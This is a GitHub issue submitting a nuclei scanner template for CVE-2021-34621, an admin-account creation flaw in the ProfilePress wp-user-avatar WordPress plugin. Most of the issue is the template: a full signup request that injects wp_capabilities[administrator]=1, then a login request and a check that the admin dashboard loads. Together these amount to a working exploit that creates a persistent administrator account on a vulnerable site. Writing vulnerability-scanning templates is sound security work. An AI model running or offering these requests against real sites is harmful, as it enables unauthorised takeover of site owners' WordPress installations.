### ISSUE TITLE
[nuclei-template] WordPress ProfilePress wp-user-avatar plugin make admin users (CVE-2021-34621)

### ISSUE THREAD

**Issue by 0xsapra** [projectdiscovery/nuclei-templates#1826]
So this CVE (CVE-2021-34621) target's WordPress plugin wp-user-avatar from  ProfilePress.
If you have a vulnerable plugin version running, no matter if creating a user ability is given by admin or not, this bugs allows an attacker to create a user with admin privilege and therefore getting admin access on WordPress site.

POC of running this template on a Vulnerable site
<img width="1197" alt="Screenshot 2021-06-30 at 2 27 34 AM" src="https://user-images.githubusercontent.com/16502221/123866753-1bf8d900-d94b-11eb-8d0d-9aa110a14d60.png">

VS Running it after updating the plugin
<img width="1274" alt="Screenshot 2021-06-30 at 2 28 06 AM" src="https://user-images.githubusercontent.com/16502221/123866860-3c289800-d94b-11eb-96bc-30476da69eb0.png">

```yaml

id: wordpress-admin-access

info:
  name: WordPress ProfilePress wp-user-avatar plugin make admin users
  author: 0xsapra
  severity: critical
  reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin
  tags: wordpress,wp-plugin

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Connection: close

        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_username"

        omegamonstor7893562
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_email"

        omegamonstor7893562@gmail.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password"

        omegamonstor7893562@gmail.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password_present"

        true
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_first_name"

        omegamonstor7893562@gmail.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_last_name"

        omegamonstor7893562@gmail.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="_wp_http_referer"

        /wp/?page_id=18
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="pp_current_url"

        {{BaseURL}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="wp_capabilities[administrator]"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_form_id"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_referrer_page"


        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="action"

        pp_ajax_signup
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="melange_id"


        -----------------------------138742543134772812001999326589--

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Connection: close

        action=pp_ajax_login&data=login_username%3domegamonstor7893562%2540gmail.com%26login_password%3domegamonstor7893562%2540gmail.com

      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close

    redirects: true
    cookie-reuse: true 
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "welcome-panel"
      - type: status
        status:
          - 200
```
